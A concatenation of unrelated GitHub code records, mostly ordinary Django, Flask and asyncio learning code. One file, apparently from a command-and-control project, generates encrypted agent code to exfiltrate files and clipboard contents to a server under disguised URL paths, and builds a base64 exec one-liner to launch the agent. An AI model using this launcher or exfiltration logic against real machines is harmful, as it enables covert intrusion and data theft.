"JuliaLiachevich/Project_site", "sub_path": "proekt_site/restoran/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1270, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.forms.ModelForm", "line_number": 6, "usage_type": "name"}, {"api_name": "models.Restoran", "line_number": 8, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 11, "usage_type": "call"}, {"api_name": "django.forms.TextInput", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms.NumberInput", "line_number": 13, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 16, "usage_type": "name"}, {"api_name": "models.Bluda", "line_number": 21, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 25, "usage_type": "call"}, {"api_name": "django.forms.Textarea", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "7330547430", "text": "import asyncio\nimport aiohttp\n\nfrom util import async_timed\nfrom chapter_4 import fetch_status\n\n\n# async def fetch_status(\n# session: ClientSession,\n# url: str,\n# delay: int = 0\n# ) -> int:\n# await asyncio.sleep(delay)\n# async with session.get(url) as result:\n# return result.status\n\n\n@async_timed()\nasync def main():\n \"\"\"Использование as_completed, по мере выполнения.\"\"\"\n async with aiohttp.ClientSession() as session:\n fetchers = [\n fetch_status(session, 'https://ya.ru', 1),\n fetch_status(session, 'https://ya.ru', 1),\n fetch_status(session, 'https://ya.ru', 10)\n ]\n for finished_task in asyncio.as_completed(fetchers):\n print(await finished_task)\n\n# asyncio.run(main())\n\n# в windows нужно управлять циклом событий вручную\n# asyncio.get_event_loop().run_until_complete(main())\nasyncio.get_event_loop().run_until_complete(main())\n", "repo_name": "mrKrivedko/async_learning", "sub_path": "learning/chapter4/listing4.8.py", "file_name": "listing4.8.py", "file_ext": "py", "file_size_in_byte": 1008, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "aiohttp.ClientSession", "line_number": 21, "usage_type": "call"}, {"api_name": "chapter_4.fetch_status", "line_number": 23, "usage_type": "call"}, {"api_name": "chapter_4.fetch_status", "line_number": 24, "usage_type": "call"}, {"api_name": "chapter_4.fetch_status", "line_number": 25, "usage_type": "call"}, {"api_name": "asyncio.as_completed", "line_number": 27, "usage_type": "call"}, {"api_name": "util.async_timed", "line_number": 18, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "39943383879", "text": "from flask import Flask, request, session, g, redirect, \\\n url_for, abort, render_template, flash\n\nfrom geojson import Feature, Point\nfrom pyproj import Proj, transform\n\nimport requests, json, time\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\napp.config.from_envvar('APP_CONFIG_FILE', silent=True)\n\nMAPBOX_ACCESS_KEY = app.config['MAPBOX_ACCESS_KEY']\n\nROUTE = [\n {\"lat\": 64.0027441, \"long\": -22.7066262, \"name\": \"Keflavik Airport\", \"is_stop_location\": True},\n {\"lat\": 64.0317168, \"long\": -22.1092311, \"name\": \"Hafnarfjordur\", \"is_stop_location\": True},\n {\"lat\": 63.99879, \"long\": -21.18802, \"name\": \"Hveragerdi\", \"is_stop_location\": True},\n {\"lat\": 63.4194089, \"long\": -19.0184548, \"name\": \"Vik\", \"is_stop_location\": True},\n {\"lat\": 63.5302354, \"long\": -18.8904333, \"name\": \"Thakgil\", \"is_stop_location\": True},\n {\"lat\": 64.2538507, \"long\": -15.2222918, \"name\": \"Hofn\", \"is_stop_location\": True},\n {\"lat\": 64.913435, \"long\": -14.01951, \"is_stop_location\": False},\n {\"lat\": 65.2622588, \"long\": -14.0179538, \"name\": \"Seydisfjordur\", \"is_stop_location\": True},\n {\"lat\": 65.2640083, \"long\": -14.4037548, \"name\": \"Egilsstadir\", \"is_stop_location\": True},\n {\"lat\": 66.0427545, \"long\": -17.3624953, \"name\": \"Husavik\", \"is_stop_location\": True},\n {\"lat\": 65.659786, \"long\": -20.723364, \"is_stop_location\": False},\n {\"lat\": 65.3958953, \"long\": -20.9580216, \"name\": \"Hvammstangi\", \"is_stop_location\": True},\n {\"lat\": 65.0722555, \"long\": -21.9704238, \"is_stop_location\": False},\n {\"lat\": 65.0189519, \"long\": -22.8767959, \"is_stop_location\": False},\n {\"lat\": 64.8929619, \"long\": -23.7260926, \"name\": \"Olafsvik\", \"is_stop_location\": True},\n {\"lat\": 64.785334, \"long\": -23.905765, \"is_stop_location\": False},\n {\"lat\": 64.174537, \"long\": -21.6480148, \"name\": \"Mosfellsdalur\", \"is_stop_location\": True},\n {\"lat\": 64.0792223, \"long\": -20.7535337, \"name\": \"Minniborgir\", \"is_stop_location\": True},\n {\"lat\": 64.14586, \"long\": -21.93955, \"name\": \"Reykjavik\", \"is_stop_location\": True},\n]\n\nBRISTOL_CENTRE = [51.520921,-2.248806]\n\n@app.route('/mapbox_js')\ndef mapbox_js():\n\n route_data = get_sustrans_data();\n\n #route_data, waypoints = get_route_data(route)\n #stop_locations = create_stop_locations_details(route)\n\n return render_template('mapbox_js.html', \n ACCESS_KEY=MAPBOX_ACCESS_KEY,\n route_data=route_data,\n map_centre=BRISTOL_CENTRE\n #,stop_locations = stop_locations\n )\n\n# Mapbox driving direction API call\nROUTE_URL = \"https://api.mapbox.com/directions/v5/mapbox/driving/{0}.json?access_token={1}&overview=full&geometries=geojson\"\n\nBCC_URL = \"https://opendata.bristol.gov.uk/api/records/1.0/search/?dataset={0}&rows={1}&geofilter.distance={2}%2C{3}%2C{4}\"\n\ndef create_route_url(route):\n # Create a string with all the geo coordinates\n lat_longs = \";\".join([\"{0},{1}\".format(point[\"long\"], point[\"lat\"]) for point in route])\n # Create a url with the geo coordinates and access token\n url = ROUTE_URL.format(lat_longs, MAPBOX_ACCESS_KEY)\n return url\n\ndef convert_coords(coord):\n inProj = Proj('epsg:3857')\n outProj = Proj('epsg:4326')\n x2,y2 = transform(inProj,outProj,coord[0],coord[1])\n return [x2, y2]\n\ndef get_route_data(route_list):\n # Get the route url\n route_data = []\n waypoints = []\n for route in route_list:\n #print(len(route))\n if len(route) < 25:\n data = send_route_request(route)\n else:\n data = {}\n route_key = \"routes\"\n #print(data.keys())\n if route_key in data.keys():\n #print(\"Not none\")\n geometry = data[\"routes\"][0][\"geometry\"]\n print(geometry)\n route_data.append(Feature(geometry = geometry, properties = {}))\n waypoints.append(data[\"waypoints\"])\n else:\n # split the coordinates and make the requests again\n #print(\"Split\")\n if \"message\" in data.keys():\n print(data[\"message\"])\n half = len(route)//2\n route_data_2, waypoints_2 = get_route_data([route[:half], route[half:]])\n route_data = route_data + route_data_2\n waypoints = waypoints + waypoints_2\n return route_data, waypoints\n\ndef send_route_request(route):\n route_url = create_route_url(route)\n # Perform a GET request to the route API\n result = requests.get(route_url)\n if result.status_code == 429:\n print(\"Too many requests error - wait for 10 seconds\")\n time.sleep(10)\n send_route_request(route)\n # Convert the return value to JSON\n json_result = result.json()\n if type(json_result) is dict:\n return json_result\n else:\n return json.loads(json_result)\n\ndef create_stop_locations_details(route_list):\n stop_locations = []\n for route in route_list:\n for location in route:\n # Skip anything that is not a stop location\n if not location[\"is_stop_location\"]:\n continue\n # Create a geojson object for stop location\n point = Point([location['long'], location['lat']])\n properties = {\n 'title': location['name'],\n 'icon': 'campsite',\n 'marker-color': '#3bb2d0',\n 'marker-symbol': len(stop_locations) + 1\n }\n feature = Feature(geometry = point, properties = properties)\n stop_locations.append(feature)\n return stop_locations\n\ndef get_sustrans_data():\n #coords = convert_coords(BRISTOL_CENTRE)\n # Get the route url\n url = BCC_URL.format(\"sustrans-cycle-network\", \"5000\", BRISTOL_CENTRE[0], BRISTOL_CENTRE[1], 1000000)\n # Perform a GET request to the route API\n result = requests.get(url)\n # Convert the return value to JSON\n data = result.json()\n # Create a geo json object from the routing data\n records = data[\"records\"]\n route_data = []\n for record in records:\n coordinates = record[\"fields\"][\"geo_shape\"][\"coordinates\"]\n #for coordinates in coordinates_list:\n route_data.append(convert_to_geojson(record, coordinates))\n return route_data\n\ndef convert_to_route(record, coordinates):\n route = []\n for coord in coordinates:\n route.append({\"lat\": coord[1], \"long\": coord[0], \"name\": record[\"fields\"][\"description\"], \"is_stop_location\": False});\n return route\n\ndef convert_to_geojson(record, coordinates):\n geometry = {\"type\": \"LineString\", \"coordinates\":coordinates}\n feature = Feature(geometry = geometry, properties = {\"name\": record[\"fields\"][\"description\"]})\n return feature", "repo_name": "hfa224/bristoldata_python", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 6626, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 48, "usage_type": "call"}, {"api_name": "pyproj.Proj", "line_number": 68, "usage_type": "call"}, {"api_name": "pyproj.Proj", "line_number": 69, "usage_type": "call"}, {"api_name": "pyproj.transform", "line_number": 70, "usage_type": "call"}, {"api_name": "geojson.Feature", "line_number": 89, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 105, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 108, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 115, "usage_type": "call"}, {"api_name": "geojson.Point", "line_number": 125, "usage_type": "call"}, {"api_name": "geojson.Feature", "line_number": 132, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 141, "usage_type": "call"}, {"api_name": "geojson.Feature", "line_number": 161, "usage_type": "call"}]} +{"seq_id": "22884375033", "text": "import base64\nimport config\nimport Logic.Agents.AgentsLogic as agentLogic\nimport Logic.Commands.CommandsLogic as commandLogic\nfrom Utils.Exceptions.NotFoundException import NotFoundException\nfrom Logic.Commands.Commands import Action\nfrom Utils import CryptoUtils\nfrom Utils import StringUtils\nfrom cryptography.fernet import Fernet\nimport Gateways.WebSocketCybClientGateway as webSocketCybClientGateway\n\nHTTP_PREFIX = 'http://'\nFIRST_PACKET_SUFFIX = 'login'\nLIST_FILES_SUFFIX = 'recommendations'\nDOWNLOAD_FILES_SUFFIX = 'map'\nCLIPBOARD_SUFFIX = 'countryInfo'\nDEFAULT_SUFFIX = 'maps'\nDISCONNECT_SUFFIX = 'personalRecommendations'\n\n\nasync def prepare_code_for_agent(ip_address: str):\n command = commandLogic.get_oldest_command_by_ip(ip_address)\n agent = agentLogic.get_agent_by_ip_address(ip_address)\n if command and agent:\n if command.action == Action.FILE_DOWNLOAD:\n with open('AgentCodes/UploadFile.txt', 'r') as file:\n data = file.read()\n data = data.replace('$key', agent.encryption_key)\n data = data.replace('$cookie', agent.cookie)\n data = data.replace('$file_name', command.parameters[\"fileName\"])\n data = data.replace('$command_id', str(command.id))\n data = data.replace('$url', f'{HTTP_PREFIX}{config.server_ip}/{DOWNLOAD_FILES_SUFFIX}')\n\n encoded_data = CryptoUtils.encode_ascii(data)\n compressed_data = CryptoUtils.compress(encoded_data)\n return CryptoUtils.encrypt(compressed_data, agent.encryption_key)\n\n if command.action == Action.LIST_FILES:\n with open('AgentCodes/ListFiles.txt', 'r') as file:\n data = file.read()\n data = data.replace('$key', agent.encryption_key)\n data = data.replace('$cookie', agent.cookie)\n data = data.replace('$dir_path', command.parameters[\"dir_path\"])\n data = data.replace('$command_id', str(command.id))\n data = data.replace('$url', f'{HTTP_PREFIX}{config.server_ip}/{LIST_FILES_SUFFIX}')\n\n encoded_data = CryptoUtils.encode_ascii(data)\n compressed_data = CryptoUtils.compress(encoded_data)\n return CryptoUtils.encrypt(compressed_data, agent.encryption_key)\n\n if command.action == Action.DISCONNECT:\n with open('AgentCodes/LastPacket.txt', 'r') as file:\n data = file.read()\n data = data.replace('$key', agent.encryption_key)\n data = data.replace('$cookie', agent.cookie)\n data = data.replace('$url', f'{HTTP_PREFIX}{config.server_ip}/{DISCONNECT_SUFFIX}')\n data = data.replace('$command_id', str(command.id))\n\n encoded_data = CryptoUtils.encode_ascii(data)\n compressed_data = CryptoUtils.compress(encoded_data)\n return CryptoUtils.encrypt(compressed_data, agent.encryption_key)\n\n if command.action == Action.CLIPBOARD_MONITOR:\n with open('AgentCodes/SendSimplePacketWithClipboard.txt', 'r') as file:\n data = file.read()\n data = data.replace('$key', agent.encryption_key)\n data = data.replace('$cookie', agent.cookie)\n data = data.replace('$url', f'{HTTP_PREFIX}{config.server_ip}/{DEFAULT_SUFFIX}')\n\n with open('AgentCodes/SendClipboard.txt', 'r') as file:\n send_clipboard_data = file.read()\n send_clipboard_data = send_clipboard_data.replace('$key', agent.encryption_key)\n send_clipboard_data = send_clipboard_data.replace('$cookie', agent.cookie)\n send_clipboard_data = send_clipboard_data.replace('$duration', str(command.parameters[\"duration\"]))\n send_clipboard_data = send_clipboard_data.replace('$command_id', str(command.id))\n send_clipboard_data = send_clipboard_data.replace('$url', f'{HTTP_PREFIX}{config.server_ip}/{CLIPBOARD_SUFFIX}')\n\n message_bytes = send_clipboard_data.encode('ascii')\n base64_bytes = base64.b64encode(message_bytes)\n base64_data = base64_bytes.decode('ascii')\n\n data = data.replace('$base64_send_clipboard', base64_data)\n\n encoded_data = CryptoUtils.encode_ascii(data)\n compressed_data = CryptoUtils.compress(encoded_data)\n\n await webSocketCybClientGateway.send_message(f\"Starting monitoring clipboard, scheduled in command {command.id}\")\n\n return CryptoUtils.encrypt(compressed_data, agent.encryption_key)\n elif agent:\n with open('AgentCodes/SendSimplePacket.txt', 'r') as file:\n data = file.read()\n data = data.replace('$key', agent.encryption_key)\n data = data.replace('$cookie', agent.cookie)\n data = data.replace('$url', f'{HTTP_PREFIX}{config.server_ip}/{DEFAULT_SUFFIX}')\n\n encoded_data = CryptoUtils.encode_ascii(data)\n compressed_data = CryptoUtils.compress(encoded_data)\n return CryptoUtils.encrypt(compressed_data, agent.encryption_key)\n\n return generate_random_message()\n\n\ndef generate_random_message():\n data = StringUtils.generate_random_string(50)\n key = Fernet.generate_key()\n encoded_data = CryptoUtils.encode_ascii(data)\n compressed_data = CryptoUtils.compress(encoded_data)\n return CryptoUtils.encrypt(compressed_data, key.decode('UTF-8'))\n\n\ndef generate_first_code_for_agent(ip_address: str):\n agent = agentLogic.get_agent_by_ip_address(ip_address)\n if agent is None:\n raise NotFoundException('Agent with given ip address not found')\n\n with open('AgentCodes/StartingPacket.txt', 'r') as file:\n data = file.read()\n\n data = data.replace('$key', agent.encryption_key)\n data = data.replace('$cookie', agent.cookie)\n data = data.replace('$url', f'{HTTP_PREFIX}{config.server_ip}/{FIRST_PACKET_SUFFIX}')\n\n message_bytes = data.encode('ascii')\n base64_bytes = base64.b64encode(message_bytes)\n base64_data = base64_bytes.decode('ascii')\n\n cmd_string = f\"python3 -c \\\"import base64; exec(base64.b64decode(\\'{base64_data}\\'))\\\"\"\n return cmd_string\n\n", "repo_name": "Kuba12a/CyberServer", "sub_path": "Logic/Request/RequestLogic.py", "file_name": "RequestLogic.py", "file_ext": "py", "file_size_in_byte": 6059, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "Logic.Commands.CommandsLogic.get_oldest_command_by_ip", "line_number": 22, "usage_type": "call"}, {"api_name": "Logic.Commands.CommandsLogic", "line_number": 22, "usage_type": "name"}, {"api_name": "Logic.Agents.AgentsLogic.get_agent_by_ip_address", "line_number": 23, "usage_type": "call"}, {"api_name": "Logic.Agents.AgentsLogic", "line_number": 23, "usage_type": "name"}, {"api_name": "Logic.Commands.Commands.Action.FILE_DOWNLOAD", "line_number": 25, "usage_type": "attribute"}, {"api_name": "Logic.Commands.Commands.Action", "line_number": 25, "usage_type": "name"}, {"api_name": "config.server_ip", "line_number": 32, "usage_type": "attribute"}, {"api_name": "Utils.CryptoUtils.encode_ascii", "line_number": 34, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 34, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.compress", "line_number": 35, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 35, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.encrypt", "line_number": 36, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 36, "usage_type": "name"}, {"api_name": "Logic.Commands.Commands.Action.LIST_FILES", "line_number": 38, "usage_type": "attribute"}, {"api_name": "Logic.Commands.Commands.Action", "line_number": 38, "usage_type": "name"}, {"api_name": "config.server_ip", "line_number": 45, "usage_type": "attribute"}, {"api_name": "Utils.CryptoUtils.encode_ascii", "line_number": 47, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 47, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.compress", "line_number": 48, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 48, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.encrypt", "line_number": 49, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 49, "usage_type": "name"}, {"api_name": "Logic.Commands.Commands.Action.DISCONNECT", "line_number": 51, "usage_type": "attribute"}, {"api_name": "Logic.Commands.Commands.Action", "line_number": 51, "usage_type": "name"}, {"api_name": "config.server_ip", "line_number": 56, "usage_type": "attribute"}, {"api_name": "Utils.CryptoUtils.encode_ascii", "line_number": 59, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 59, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.compress", "line_number": 60, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 60, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.encrypt", "line_number": 61, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 61, "usage_type": "name"}, {"api_name": "Logic.Commands.Commands.Action.CLIPBOARD_MONITOR", "line_number": 63, "usage_type": "attribute"}, {"api_name": "Logic.Commands.Commands.Action", "line_number": 63, "usage_type": "name"}, {"api_name": "config.server_ip", "line_number": 68, "usage_type": "attribute"}, {"api_name": "config.server_ip", "line_number": 76, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 79, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils.encode_ascii", "line_number": 84, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 84, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.compress", "line_number": 85, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 85, "usage_type": "name"}, {"api_name": "Gateways.WebSocketCybClientGateway.send_message", "line_number": 87, "usage_type": "call"}, {"api_name": "Gateways.WebSocketCybClientGateway", "line_number": 87, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.encrypt", "line_number": 89, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 89, "usage_type": "name"}, {"api_name": "config.server_ip", "line_number": 95, "usage_type": "attribute"}, {"api_name": "Utils.CryptoUtils.encode_ascii", "line_number": 97, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 97, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.compress", "line_number": 98, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 98, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.encrypt", "line_number": 99, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 99, "usage_type": "name"}, {"api_name": "Utils.StringUtils.generate_random_string", "line_number": 105, "usage_type": "call"}, {"api_name": "Utils.StringUtils", "line_number": 105, "usage_type": "name"}, {"api_name": "cryptography.fernet.Fernet.generate_key", "line_number": 106, "usage_type": "call"}, {"api_name": "cryptography.fernet.Fernet", "line_number": 106, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.encode_ascii", "line_number": 107, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 107, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.compress", "line_number": 108, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 108, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.encrypt", "line_number": 109, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 109, "usage_type": "name"}, {"api_name": "Logic.Agents.AgentsLogic.get_agent_by_ip_address", "line_number": 113, "usage_type": "call"}, {"api_name": "Logic.Agents.AgentsLogic", "line_number": 113, "usage_type": "name"}, {"api_name": "Utils.Exceptions.NotFoundException.NotFoundException", "line_number": 115, "usage_type": "call"}, {"api_name": "config.server_ip", "line_number": 122, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "2639036916", "text": "\"\"\"monthly_prj URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include, re_path, path\nfrom app.views import (\n get_data,\n get_data_eda,\n get_data_search,\n get_data_search_result,\n get_data_platform_search,\n get_community,\n get_data_search_detail1,\n get_data_search_detail2,\n)\n\nurlpatterns = [\n path(\"data_schema/\", get_data),\n path(\"data_eda/\", get_data_eda),\n path(\"data_search/\", get_data_search),\n path(\"data_search_result/\", get_data_search_result),\n path(\"data_search_detail1/\", get_data_search_detail1),\n path(\"data_search_detail2/\", get_data_search_detail2),\n path(\"data_platform_search/\", get_data_platform_search),\n path(\"community/\", get_community),\n re_path(r\"^admin/\", admin.site.urls),\n re_path(r\"^app/\", include(\"app.urls\")),\n re_path(r\"^\", include(\"app.urls\")),\n]\n", "repo_name": "Paul-scpark/Data-planet", "sub_path": "ETRI/etri_django/monthly_prj/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "app.views.get_data", "line_number": 30, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "app.views.get_data_eda", "line_number": 31, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "app.views.get_data_search", "line_number": 32, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "app.views.get_data_search_result", "line_number": 33, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "app.views.get_data_search_detail1", "line_number": 34, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "app.views.get_data_search_detail2", "line_number": 35, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "app.views.get_data_platform_search", "line_number": 36, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "app.views.get_community", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.urls.re_path", "line_number": 38, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 38, "usage_type": "name"}, {"api_name": "django.urls.re_path", "line_number": 39, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 39, "usage_type": "call"}, {"api_name": "django.urls.re_path", "line_number": 40, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "16799605733", "text": "'''\n\tThis appy has changed to incorporate external JS code for perceptual decision - making task running on the same api\n\tApril 2020 VS for covid19 study \n'''\nimport os\nimport logging\n\nimport warnings\nimport subprocess\nfrom flask_cors import CORS\nfrom flask import Flask, jsonify, request, abort, Response, make_response, render_template \n\nfrom models.db import db\nfrom models.install import install_models\n\nfrom config import config \n\n\n# to test well functioning : https://udecmac.osc-fr1.scalingo.io/testmethod\nwarnings.filterwarnings(\"ignore\")\n\n\n# Database setup\n# from db import db_session\n# from models import Task \n# from config import config\n\n# Set up logging\nlogfilepath = os.path.join(os.path.dirname(os.path.abspath(__file__)),\n config.get(\"Server Parameters\", \"logfile\"))\n# --- Logging ---- # \nloglevels = [logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR, logging.CRITICAL]\nloglevel = loglevels[config.getint(\"Server Parameters\", \"loglevel\")]\nlogging.basicConfig( filename=logfilepath, format='%(asctime)s %(message)s', level=loglevel )\n\n# constants\nCODE_VERSION = config.get('Task Parameters', 'code_version')\n\n\napp = Flask(__name__)\n\n# -------------------------\n# --- DB configuration ---- \n# -------------------------\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL')\n# app.config['SQLALCHEMY_DATABASE_URI'] = config.get('Database Parameters','database_url')\n# 'mysql://root:pwd@localhost/covid19' # maybe put in the cofig \n\ndb.init_app(app)\nCORS(app)\n\nwith app.app_context():\n install_models()\n import routes\n\n\n#----------------------------------------------\n# ExperimentError Exception, for db errors, etc.\n#----------------------------------------------\n\n# Possible ExperimentError values. MODIFY \nexperiment_errors = dict(\n status_incorrectly_set = 1000,\n prolific_study_participant_longit_id_not_set = 1001,\n tried_to_quit = 1011,\n intermediate_save = 1012,\n improper_inputs = 1013,\n page_not_found = 404,\n in_debug = 2005,\n unknown_error = 9999\n)\n\nclass ExperimentError(Exception):\n \"\"\"\n Error class for experimental errors, such as subject not being found in\n the database.\n \"\"\"\n def __init__(self, value):\n self.value = value\n self.errornum = experiment_errors[self.value]\n def __str__(self):\n return repr(self.value)\n def error_page(self, request):\n return render_template('error.html',\n errornum=self.errornum,\n **request.args)\n\n@app.errorhandler(ExperimentError)\ndef handleExpError(e):\n \"\"\"Handle errors by sending an error page.\"\"\"\n return e.error_page( request )\n\n\n# @app.teardown_request\n# def shutdown_session(exception=None):\n# db_session.remove()\n\n# --- TESTING THE SERVER IS WORKING -----------\n@app.route('/testmethod', methods=['GET', 'POST'])\ndef mytest():\n result = dict()\n result['test'] = 'ok'\n return jsonify(result), 200\n\n@app.route('/')\ndef regularpage(pagename=None):\n \n \"\"\"\n Important!: you need this part to make the sequential page working via showpages! \n \"\"\"\n if pagename==None:\n raise ExperimentError('page_not_found')\n return render_template(pagename)\n\n\n# @app.teardown_request\n# def shutdown_session(exception=None):\n# db_session.remove()\n\n\n###########################################################\n# let's start\n###########################################################\n \nif __name__ == '__main__':\n print(\"Starting webserver.\")\n port = int(os.environ.get(\"PORT\", 5000)) \n app.run(host=\"0.0.0.0\", port=port,debug=config.getboolean('Server Parameters', 'debug'))\n\n\t\n", "repo_name": "vasilisa/udecmac-api", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3908, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "warnings.filterwarnings", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 29, "usage_type": "call"}, {"api_name": "config.config.get", "line_number": 30, "usage_type": "call"}, {"api_name": "config.config", "line_number": 30, "usage_type": "name"}, {"api_name": "logging.DEBUG", "line_number": 32, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 32, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 32, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 32, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 32, "usage_type": "attribute"}, {"api_name": "config.config.getint", "line_number": 33, "usage_type": "call"}, {"api_name": "config.config", "line_number": 33, "usage_type": "name"}, {"api_name": "logging.basicConfig", "line_number": 34, "usage_type": "call"}, {"api_name": "config.config.get", "line_number": 37, "usage_type": "call"}, {"api_name": "config.config", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 45, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.db.db.init_app", "line_number": 49, "usage_type": "call"}, {"api_name": "models.db.db", "line_number": 49, "usage_type": "name"}, {"api_name": "flask_cors.CORS", "line_number": 50, "usage_type": "call"}, {"api_name": "models.install.install_models", "line_number": 53, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 86, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.request", "line_number": 91, "usage_type": "argument"}, {"api_name": "flask.jsonify", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 113, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 127, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 127, "usage_type": "attribute"}, {"api_name": "config.config.getboolean", "line_number": 128, "usage_type": "call"}, {"api_name": "config.config", "line_number": 128, "usage_type": "name"}]} +{"seq_id": "36451892939", "text": "from typing import List, Tuple, Dict\nfrom pathlib import Path\nfrom collections import Counter, defaultdict\n\n\ndef read_input(filename: str) -> Tuple[str, List[List[str]]]:\n path_to_input = Path(__file__).parent / filename\n with open(path_to_input) as f:\n content = f.readlines()\n\n content = [row.strip(\"\\n\") for row in content]\n polymer = content[0]\n\n rules = [row.split(\" -> \") for row in 